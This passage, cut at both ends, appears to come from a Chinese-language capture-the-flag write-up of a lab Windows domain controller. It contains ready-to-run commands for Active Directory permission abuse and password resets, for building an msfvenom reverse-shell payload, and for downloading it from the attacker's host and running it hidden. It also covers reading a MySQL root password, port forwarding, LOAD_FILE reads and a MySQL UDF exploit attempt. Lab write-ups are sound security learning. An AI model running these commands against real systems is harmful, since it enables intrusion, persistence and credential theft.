--kerberos --dc-ip 10.10.11.31 -u "e.rodriguez" -p "QWEasd123@123" set password "m.harris" "QWEasd123@123"</span><br></pre></td></tr></table></figure><p>然后再进行<code>m.harris</code>凭据获取,再用<code>evil-winrm</code>使用这个凭据登录</p><p>难受,这个靶机是公用的,所以密码会互相覆盖,那么只能全部命令放在一起执行了</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">getTGT.py infiltrator.htb/d.anderson:'WAT?watismypass!' -dc-ip dc01.infiltrator.htb</span><br><span class="line"></span><br><span class="line">export KRB5CCNAME=d.anderson.ccache</span><br><span class="line"></span><br><span class="line">dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' 'infiltrator.htb/d.anderson' -k -no-pass -dc-ip dc01.infiltrator.htb</span><br><span class="line"></span><br><span class="line">python /opt/AD_tools/bloodyAD/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --kerberos --dc-ip 10.10.11.31 -u "d.anderson" -p "WAT?watismypass\!" set password "e.rodriguez" "QWEasd123@123"</span><br><span class="line"></span><br><span class="line">getTGT.py infiltrator.htb/e.rodriguez:"QWEasd123@123" -dc-ip dc01.infiltrator.htb</span><br><span class="line"></span><br><span class="line">KRB5CCNAME=e.rodriguez.ccache</span><br><span class="line">python /opt/AD_tools/bloodyAD/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --dc-ip 10.10.11.31 -u e.rodriguez -k add groupMember "CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB" e.rodriguez</span><br><span class="line"></span><br><span class="line">python /opt/AD_tools/bloodyAD/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --kerberos --dc-ip 10.10.11.31 -u "e.rodriguez" -p "QWEasd123@123" set password "m.harris" "QWEasd123@123"</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">getTGT.py infiltrator.htb/m.harris:'QWEasd123@123' -dc-ip dc01.infiltrator.htb</span><br><span class="line"></span><br><span class="line">KRB5CCNAME=m.harris.ccache evil-winrm -i dc01.infiltrator.htb -u m.harris -r infiltrator.htb</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>这里直接用</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">evil-winrm -i dc01.infiltrator.htb -u m.harris -p "QWEasd123@123"</span><br></pre></td></tr></table></figure><p>是登录不了的<br>所以乖乖的用Kerberos auth,也就是<code>KRB5CCNAME=m.harris.ccache</code> 加上<code>-r infiltrator.htb</code></p><h1 id="权限维持"><a href="#权限维持" class="headerlink" title="权限维持"></a>权限维持</h1><p>这密码大伙挤着改,给我整怕了,赶紧上msf</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.2 LPORT=9001 -f exe -o reverse.exe</span><br><span class="line">[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload</span><br><span class="line">[-] No arch selected, selecting arch: x64 from the payload</span><br><span class="line">No encoder specified, outputting raw payload</span><br><span class="line">Payload size: 510 bytes</span><br><span class="line">Final size of exe file: 7168 bytes</span><br><span class="line">Saved as: reverse.exe</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>本机用python起一个简单的http服务器 </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -m http.server 80</span><br></pre></td></tr></table></figure><p>然后用evil-winrm直接给他下载到目标机器,并在后台运行</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">wget http://10.10.16.2/reverse.exe -o reverse.exe</span><br><span class="line">Start-Process -FilePath "reverse.exe" -WindowStyle Hidden</span><br></pre></td></tr></table></figure><p>看到shell连回来,我才敢慢慢操作</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.10.16.2; set lport 9001; exploit -j"</span><br><span class="line">[*] Using configured payload generic/shell_reverse_tcp</span><br><span class="line">payload => windows/x64/meterpreter/reverse_tcp</span><br><span class="line">lhost => 10.10.16.2</span><br><span class="line">lport => 9001</span><br><span class="line">[*] Started reverse TCP handler on 10.10.16.2:9001 </span><br><span class="line">[*] Sending stage (201798 bytes) to 10.10.11.31</span><br><span class="line">[*] Meterpreter session 1 opened (10.10.16.2:9001 -> 10.10.11.31:63625) at 2024-09-06 10:57:03 -0400</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>这里我用了 -j<br>持续监听收shell<br>所以我可以在<code>evil-winrm</code>多运行几次<code>Start-Process -FilePath "reverse.exe" -WindowStyle Hidden</code><br>这样多搞几个进程,在打靶机时候不至于因为一个进程崩了,导致全部重来</p><p>在实际攻防中,拿下一个shell也要用多种方法维持权限,高危操作要用单独的进程操作,这里由于只是打靶机,我只是多搞了几个进程。</p><h1 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h1><p><a href="https://github.com/peass-ng/PEASS-ng">peass-ng/PEASS-ng: PEASS - Privilege Escalation Awesome Scripts SUITE (with colors) (github.com)</a></p><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">start</span> /b winPEASx64.exe >> output.txt</span><br></pre></td></tr></table></figure><p>整理可能有用的东西</p><p>在进程列表里能看到OMServerService、outputmessenger_httpd、outputmessenger_mysqld比较显眼</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">TCP [::] 14118 [::] 0 Listening 7460 OMServerService</span><br><span class="line">TCP [::] 14122 [::] 0 Listening 7460 OMServerService</span><br><span class="line">TCP [::] 14123 [::] 0 Listening 4 System</span><br><span class="line">TCP [::] 14125 [::] 0 Listening 4 System</span><br><span class="line">TCP [::] 14126 [::] 0 Listening 3396 outputmessenger_httpd</span><br><span class="line">TCP [::] 14127 [::] 0 Listening 7460 OMServerService</span><br><span class="line">TCP [::] 14128 [::] 0 Listening 7460 OMServerService</span><br><span class="line">TCP [::] 14130 [::] 0 Listening 7460 OMServerService</span><br><span class="line">TCP [::] 14406 [::] 0 Listening 5548 outputmessenger_mysqld</span><br><span class="line"></span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Output Messenger - MySQL(Output Messenger - MySQL)["C:\Program Files\Output Messenger Server\Plugins\Output\mysql\bin\outputmessenger_mysqld.exe" "--defaults-file=C:\Program Files\Output Messenger Server\Plugins\Output\mysql\my.ini" "OutputMessengerMySQL"] - Autoload</span><br><span class="line">Output Messenger - MySQL</span><br></pre></td></tr></table></figure><p>可以直接看到这个起了mysql的进程好像有点东西</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">C:\Users\M.harris>cd "C:\Program Files\Output Messenger Server\"</span><br><span class="line">cd "C:\Program Files\Output Messenger Server\" </span><br><span class="line">Access is denied. </span><br></pre></td></tr></table></figure><p>又没有权限</p><p>那就得找找他的文件了</p><p>能够自动,绝对不手动,msf冲冲冲</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">meterpreter > search -f "*Output Messenger Server*"</span><br><span class="line">Found 4 results...</span><br><span class="line">==================</span><br><span class="line"></span><br><span class="line">Path Size (bytes) Modified (UTC)</span><br><span class="line">---- ------------ --------------</span><br><span class="line">c:\ProgramData\Microsoft\Windows\Start Menu\Programs\Output Messenger\Output Messenger Server\Output Messenger Server Manager.lnk 1188 2024-02-25 10:35:07 -0500</span><br><span class="line">c:\ProgramData\Microsoft\Windows\Start Menu\Programs\Output Messenger\Output Messenger Server\Uninstall Output Messenger Server.lnk 1136 2024-02-19 10:41:20 -0500</span><br><span class="line">c:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Output Messenger\Output Messenger Server\Output Messenger Server Manager.lnk 1188 2024-02-25 10:35:07 -0500</span><br><span class="line">c:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Output Messenger\Output Messenger Server\Uninstall Output Messenger Server.lnk 1136 2024-02-19 10:41:20 -0500</span><br></pre></td></tr></table></figure><p>这似乎有点少,而且找到的都是快捷方式</p><p>如果是文件名,在windows上一般不会有空格隔开</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Output Messenger -> OutputMessenger</span><br></pre></td></tr></table></figure><p>再找找</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">meterpreter > search -f "*OutputMessenger*"</span><br><span class="line">Found 6 results...</span><br><span class="line">==================</span><br><span class="line"></span><br><span class="line">Path Size (bytes) Modified (UTC)</span><br><span class="line">---- ------------ --------------</span><br><span class="line">c:\Program Files\Output Messenger\OutputMessenger.exe 6826240 2023-10-23 16:41:12 -0400</span><br><span class="line">c:\Program Files\Output Messenger\OutputMessenger.exe.config 1788 2022-12-19 14:07:18 -0500</span><br><span class="line">c:\ProgramData\Output Messenger Server\Temp\OutputMessengerApache.zip 15702539 2024-02-19 10:51:30 -0500</span><br><span class="line">c:\ProgramData\Output Messenger Server\Temp\OutputMessengerMysql.zip 25477937 2024-02-19 10:51:52 -0500</span><br><span class="line">c:\Users\All Users\Output Messenger Server\Temp\OutputMessengerApache.zip 15702539 2024-02-19 10:51:30 -0500</span><br><span class="line">c:\Users\All Users\Output Messenger Server\Temp\OutputMessengerMysql.zip 25477937 2024-02-19 10:51:52 -0500</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>hh不亏是我<br>这里看到了一个<code>OutputMessenger.exe.config</code>,这一看就是要出货的节奏<br>如果不出结果只能下载那几个zip下来分析了</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">meterpreter > cat "c:\Program Files\Output Messenger\OutputMessenger.exe.config"</span><br><span class="line"><?xml version="1.0" encoding="utf-8"?></span><br><span class="line"><configuration></span><br><span class="line"> <configSections></span><br><span class="line"> <section name="entityFramework" type="System.Data.Entity.Internal.ConfigFile.EntityFrameworkSection, EntityFramework, Version=6.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" requirePermission="false"/></span><br><span class="line"> </configSections></span><br><span class="line"> <runtime></span><br><span class="line"> <legacyCorruptedStateExceptionsPolicy enabled="false"/></span><br><span class="line"> </runtime></span><br><span class="line"> <startup useLegacyV2RuntimeActivationPolicy="true"></span><br><span class="line"> <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0"/></span><br><span class="line"> </startup></span><br><span class="line"> <system.data></span><br><span class="line"> <DbProviderFactories></span><br><span class="line"> <clear/></span><br><span class="line"> <remove invariant="System.Data.SQLite"/></span><br><span class="line"> <add name="SQLite Data Provider" invariant="System.Data.SQLite" description="Data Provider for SQLite" type="System.Data.SQLite.SQLiteFactory, System.Data.SQLite"/></span><br><span class="line"> <remove invariant="System.Data.SQLite.EF6"/></span><br><span class="line"> <add name="SQLite Data Provider (Entity Framework 6)" invariant="System.Data.SQLite.EF6" description=".NET Framework Data Provider for SQLite (Entity Framework 6)" type="System.Data.SQLite.EF6.SQLiteProviderFactory, System.Data.SQLite.EF6"/></span><br><span class="line"> </DbProviderFactories></span><br><span class="line"> </system.data></span><br><span class="line"> <entityFramework></span><br><span class="line"> <defaultConnectionFactory type="System.Data.Entity.Infrastructure.SqlConnectionFactory, EntityFramework"/></span><br><span class="line"> <providers></span><br><span class="line"> <provider invariantName="System.Data.SqlClient" type="System.Data.Entity.SqlServer.SqlProviderServices, EntityFramework.SqlServer"/></span><br><span class="line"> <provider invariantName="System.Data.SQLite" type="System.Data.SQLite.EF6.SQLiteProviderServices, System.Data.SQLite.EF6"/></span><br><span class="line"> <provider invariantName="System.Data.SQLite.EF6" type="System.Data.SQLite.EF6.SQLiteProviderServices, System.Data.SQLite.EF6" /></span><br><span class="line"> </providers></span><br><span class="line"> </entityFramework></span><br><span class="line"></configuration></span><br><span class="line"></span><br></pre></td></tr></table></figure><p>啊?SQLite一般不联网使用的,而且明显有个<code>OutputMessengerMysql.zip</code>看来主要目标是它</p><p>看来还是得下载zip来看看了</p><p>边下载zip,还可以边看看这个<code>c:\Program Files\Output Messenger\</code>目录</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><span class="line">C:\Users\M.harris>dir "c:\Program Files\Output Messenger\"</span><br><span class="line">dir "c:\Program Files\Output Messenger\"</span><br><span class="line"> Volume in drive C has no label.</span><br><span class="line"> Volume Serial Number is 96C7-B603</span><br><span class="line"></span><br><span class="line"> Directory of c:\Program Files\Output Messenger</span><br><span class="line"></span><br><span class="line">02/23/2024 06:06 AM <DIR> .</span><br><span class="line">02/23/2024 06:06 AM <DIR> ..</span><br><span class="line">01/30/2021 02:03 PM 352 add_reinstall_prop.vbs</span><br><span class="line">04/07/2010 11:56 AM 106,496 antlr.runtime.dll</span><br><span class="line">01/30/2021 02:03 PM 15,186 Buzz.wav</span><br><span class="line">06/24/2022 02:13 PM 26,112 DDay.Collections.dll</span><br><span class="line">06/24/2022 02:13 PM 198,656 DDay.iCal.dll</span><br><span class="line">02/23/2024 06:06 AM <DIR> EmojiImg</span><br><span class="line">01/30/2021 02:03 PM 4,965,584 EntityFramework.dll</span><br><span class="line">01/30/2021 02:03 PM 595,152 EntityFramework.SqlServer.dll</span><br><span class="line">01/30/2021 02:03 PM 456,192 Hunspellx64.dll</span><br><span class="line">01/30/2021 02:03 PM 407,552 Hunspellx86.dll</span><br><span class="line">01/30/2021 02:03 PM 212,992 ICSharpCode.SharpZipLib.dll</span><br><span class="line">02/23/2024 06:06 AM <DIR> Languages</span><br><span class="line">08/26/2016 04:53 PM 24,064 LINQtoCSV.dll</span><br><span class="line">09/11/2020 01:59 PM 3,700 Login.wav</span><br><span class="line">09/11/2020 01:59 PM 3,534 Logout.wav</span><br><span class="line">02/23/2024 06:06 AM <DIR> MachineConfigFix</span><br><span class="line">09/11/2020 01:59 PM 16,450 Message.wav</span><br><span class="line">01/30/2021 02:03 PM 259,464 Microsoft.VisualBasic.PowerPacks.Vs.dll</span><br><span class="line">01/31/2020 06:02 PM 513,536 NAudio.dll</span><br><span class="line">06/22/2015 12:06 PM 510,976 Newtonsoft.Json.dll</span><br><span class="line">01/30/2021 02:03 PM 24,576 NHunspell.dll</span><br><span class="line">10/23/2023 01:40 PM 1,855,488 NHunspellExtender.dll</span><br><span class="line">06/11/2021 07:07 PM 24,912 OM.AutoUpdate.exe</span><br><span class="line">10/23/2023 01:40 PM 12,288 OM.ChatCommands.dll</span><br><span class="line">10/23/2023 01:40 PM 95,232 OM.Client.dll</span><br><span class="line">10/23/2023 01:40 PM 195,584 OM.Common.dll</span><br><span class="line">10/23/2023 01:40 PM 11,776 OM.DragDrop.dll</span><br><span class="line">10/23/2023 01:40 PM 68,096 OM.File.dll</span><br><span class="line">11/09/2016 05:47 PM 8,704 OM.FileReader.dll</span><br><span class="line">10/23/2023 01:40 PM 645,632 OM.OMDB.dll</span><br><span class="line">10/23/2023 01:40 PM 142,336 OM.Packet.dll</span><br><span class="line">10/23/2023 01:40 PM 195,072 OM.Plugin.dll</span><br><span class="line">10/23/2023 01:40 PM 218,624 OM.RD.dll</span><br><span class="line">10/23/2023 01:40 PM 297,472 OM.Snip.dll</span><br><span class="line">04/24/2021 12:11 PM 65,536 OM.Tab.dll</span><br><span class="line">10/23/2023 01:40 PM 19,968 OM.User.dll</span><br><span class="line">10/23/2023 01:41 PM 6,826,240 OutputMessenger.exe</span><br><span class="line">12/19/2022 12:07 PM 1,788 OutputMessenger.exe.config</span><br><span class="line">02/23/2024 06:06 AM <DIR> Plugins</span><br><span class="line">09/12/2020 03:04 PM 156,522 RING.WAV</span><br><span class="line">02/23/2024 06:06 AM <DIR> SpellCheck</span><br><span class="line">01/30/2021 02:03 PM 275,968 System.Data.SQLite.dll</span><br><span class="line">01/30/2021 02:03 PM 183,808 System.Data.SQLite.EF6.dll</span><br><span class="line">01/30/2021 02:03 PM 183,808 System.Data.SQLite.Linq.dll</span><br><span class="line">07/19/2016 02:53 PM 191,152 System.Net.Http.dll</span><br><span class="line">02/23/2024 06:06 AM <DIR> TeamTalk</span><br><span class="line">04/09/2022 11:38 AM 5,941,072 TeamTalk5Pro.dll</span><br><span class="line">04/09/2022 11:38 AM 128,512 TeamTalk5Pro.NET.dll</span><br><span class="line">02/23/2024 06:06 AM 33,424 unins000.dat</span><br><span class="line">02/23/2024 06:06 AM 724,224 unins000.exe</span><br><span class="line">02/23/2024 06:06 AM 11,401 unins000.msg</span><br><span class="line">02/23/2024 06:06 AM <DIR> x64</span><br><span class="line">02/23/2024 06:06 AM <DIR> x86</span><br><span class="line"> 45 File(s) 26,855,213 bytes</span><br><span class="line"> 10 Dir(s) 46,407,237,632 bytes free</span><br></pre></td></tr></table></figure><p>几个目录翻了翻,没找到啥有用的,希望下载下来的zip不要就是我刚刚看的这玩意</p><p>OutputMessengerMysql.zip解压包里吐出一个好东西</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">└─$ cat OutputMysql.ini </span><br><span class="line">[SETTINGS]</span><br><span class="line">SQLPort=14406</span><br><span class="line">Version=1.0.0</span><br><span class="line"></span><br><span class="line">[DBCONFIG]</span><br><span class="line">DBUsername=root</span><br><span class="line">DBPassword=ibWijteig5</span><br><span class="line">DBName=outputwall</span><br><span class="line"></span><br><span class="line">[PATHCONFIG]</span><br><span class="line">;mysql5.6.17</span><br><span class="line">MySQL=mysql</span><br><span class="line">Log=log</span><br><span class="line">def_conf=settings</span><br><span class="line">MySQL_data=data</span><br><span class="line">Backup=backup</span><br></pre></td></tr></table></figure><p>这root不会是真root吧,那我可直接冲了</p><p>我现在需要将里面的端口转发到我本地</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">portfwd add -l 53366 -L 0.0.0.0 -p 14406 -r 10.10.11.31</span><br></pre></td></tr></table></figure><p>说实话,msf打靶机舒服的。如果不用msf,这里可以用chisel、frp、nps等等穿透工具</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysql -h 127.0.0.1 -uroot -P 53366 -p</span><br></pre></td></tr></table></figure><p>看上面那个DBName=outputwall,可以确认拿下了数据库权限</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">MariaDB [(none)]> show databases;</span><br><span class="line">+--------------------+</span><br><span class="line">| Database |</span><br><span class="line">+--------------------+</span><br><span class="line">| information_schema |</span><br><span class="line">| mysql |</span><br><span class="line">| outputwall |</span><br><span class="line">| performance_schema |</span><br><span class="line">+--------------------+</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">MariaDB [outputwall]> show tables;</span><br><span class="line">+---------------------------+</span><br><span class="line">| Tables_in_outputwall |</span><br><span class="line">+---------------------------+</span><br><span class="line">| ot_attachment |</span><br><span class="line">| ot_comments |</span><br><span class="line">| ot_entity |</span><br><span class="line">| ot_entity_accounts |</span><br><span class="line">| ot_entity_daysoff |</span><br><span class="line">| ot_entity_setting |</span><br><span class="line">| ot_sessions |</span><br><span class="line">| ot_user_notification_read |</span><br><span class="line">| ot_user_notifications |</span><br><span class="line">| ot_wall_activity |</span><br><span class="line">| ot_wall_favorite |</span><br><span class="line">| ot_wall_notification |</span><br><span class="line">| ot_wall_posts |</span><br><span class="line">| ot_wall_tagmessages |</span><br><span class="line">| ot_wall_tags |</span><br><span class="line">| ot_wall_tokens |</span><br><span class="line">| ot_wall_usermessages |</span><br><span class="line">+---------------------------+</span><br><span class="line">17 rows in set (0.869 sec)</span><br><span class="line"></span><br><span class="line">MariaDB [outputwall]> SELECT LOAD_FILE('C:\\Users\\Administrator\\Desktop\\root.txt');</span><br><span class="line">+----------------------------------------------------------+</span><br><span class="line">| LOAD_FILE('C:\\Users\\Administrator\\Desktop\\root.txt') |</span><br><span class="line">+----------------------------------------------------------+</span><br><span class="line">| 6c25a2e506000ffc77da4fbc0ee3a032</span><br><span class="line"> |</span><br><span class="line">+----------------------------------------------------------+</span><br><span class="line">1 row in set (0.870 sec)</span><br></pre></td></tr></table></figure><p>我确定了,这是真root,都可以读Administrator的flag了<br>如果是打工,或者是做什么der项目,估计到这里我就下班了</p><p>但是,这么nb的靶机肯定还有东西没教我,东西没学到怎能撤退</p><p>#mysql #查看安装路径</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">MariaDB [outputwall]> select @@basedir;</span><br><span class="line">+----------------------------------------------------------------+</span><br><span class="line">| @@basedir |</span><br><span class="line">+----------------------------------------------------------------+</span><br><span class="line">| C:\Program Files\Output Messenger Server\Plugins\Output\mysql\ |</span><br><span class="line">+----------------------------------------------------------------+</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>#mysql #udf </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">msf6 exploit(multi/mysql/mysql_udf_payload) > exploit </span><br><span class="line"></span><br><span class="line">[*] Started reverse TCP handler on 10.10.16.2:4444 </span><br><span class="line">[*] 127.0.0.1:53366 - Checking target architecture...</span><br><span class="line">[*] 127.0.0.1:53366 - Checking for sys_exec()...</span><br><span class="line">[*] 127.0.0.1:53366 - Checking target architecture...</span><br><span class="line">[*] 127.0.0.1:53366 - Checking for MySQL plugin directory...</span><br><span class="line">[*] 127.0.0.1:53366 - Target arch (win32) and target path both okay.</span><br><span class="line">[*] 127.0.0.1:53366 - Uploading lib_mysqludf_sys_32.dll library to C:/Program Files/Output Messenger Server/Plugins/Output/mysql/lib/plugin/yQUJZIok.dll...</span><br><span class="line">[-] 127.0.0.1:53366 - MySQL Error: Mysql::ServerError Can't create/write to file 'C:\Program Files\Output Messenger Server\Plugins\Output\mysql\lib\plugin\yQUJZIok.dll' (Errcode: 2 "No such file or directory")</span><br><span class="line">[-] 127.0.0.1:53366 - MySQL Error: Mysql::ServerError::CantOpenLibrary Can't open shared library 'yQUJZIok.dll' (errno: 2, The specified module could not be found.</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>怀疑是没传上去,手动试试</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">MySQL 5.6 对应 MariaDB 10.0</span><br><span class="line">MySQL 5.7 对应 MariaDB 10.2</span><br></pre></td></tr></table></figure><p>而我现在用的是</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">MariaDB [outputwall]> select version();</span><br><span class="line">+-----------------+</span><br><span class="line">| version() |</span><br><span class="line">+-----------------+</span><br><span class="line">| 10.1.19-MariaDB |</span><br><span class="line">+-----------------+</span><br><span class="line">1 row in set (0.901 sec)</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>udf提权在Mysql >= 5.1 时,需要在那个<code>lib\plugin</code>路径下<br>就是说我得先创建这个路径,然后再传</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">C:\Users\M.harris>dir "C:/Program Files/Output Messenger Server/Plugins/"</span><br><span class="line">dir "C:/Program Files/Output Messenger Server/Plugins/"</span><br><span class="line"> Volume in drive C has no label.</span><br><span class="line"> Volume Serial Number is 96C7-B603</span><br><span class="line"></span><br><span class="line"> Directory of C:\Program Files\Output Messenger Server\Plugins</span><br><span class="line"></span><br><span class="line">File Not 